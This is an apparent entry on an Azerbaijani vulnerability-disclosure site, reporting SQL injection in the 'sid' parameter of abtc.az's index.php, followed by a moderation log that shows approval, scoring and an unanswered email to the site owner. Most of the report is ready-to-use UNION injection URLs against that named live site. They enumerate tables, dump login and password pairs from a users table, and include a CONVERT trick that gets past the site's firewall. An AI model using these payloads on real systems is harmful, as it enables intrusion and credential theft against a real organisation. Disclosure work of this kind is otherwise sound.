Sql Injection index.php?sid= parametr

abtc.az 11 İyun 2016, 17:57

Ətraflı məlumat

http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid= Zererli Sql Kodlari
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT version(),2 --+- #version
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT table_name,null from information_schema.tables where tables_schema=database() limit 0,1--+- # Limit 0,1 olan yerde 0 <70 araligina qeder deyisherek db-de olan table_name lere baxa bilerisiz
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT CONVERT(group_concat(login,0x3a,passw) USING utf8),null from users limit 0,1--+- # users tablesinden datalari alan zaman firewall aktivleshir ve datalari cekmeye imkan vermir, ona gore Convert ile utf-8 e convert ederek datalari almag olar

# Umumulikden Gelen Datalari Saytin Sourccesini Acarag <title> Bu HISSEDE BAXA BILERSIZ </title>

Qeydlər

  • 21 Oktyabr 2016, 13:35
    Boşluğun statusu
    Mənbədən cavab gəlmədi

  • 04 Oktyabr 2016, 10:02
    Boşluğa bal verildi
    Boşluğun tərcüməsi üçün tərcüməçiyə 9 bal verildi

  • 04 Oktyabr 2016, 10:02
    Boşluğa bal verildi
    Boşluğun tərcüməsinə görə müəllifə 1 bal verildi

  • 16 İyun 2016, 12:04
    Boşluğun statusu
    Mənbəyə boşluq haqqında e-poçt göndərildi

  • 12 İyun 2016, 17:54
    Boşluğa bal verildi
    Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 9 bal təyin etdi

  • 12 İyun 2016, 17:54
    Boşluğun statusu
    Moderator tərəfindən təsdiq edildi

  • 11 İyun 2016, 17:57
    Boşluq əlavə edildi
    Boşluq BUGemota əlavə edildi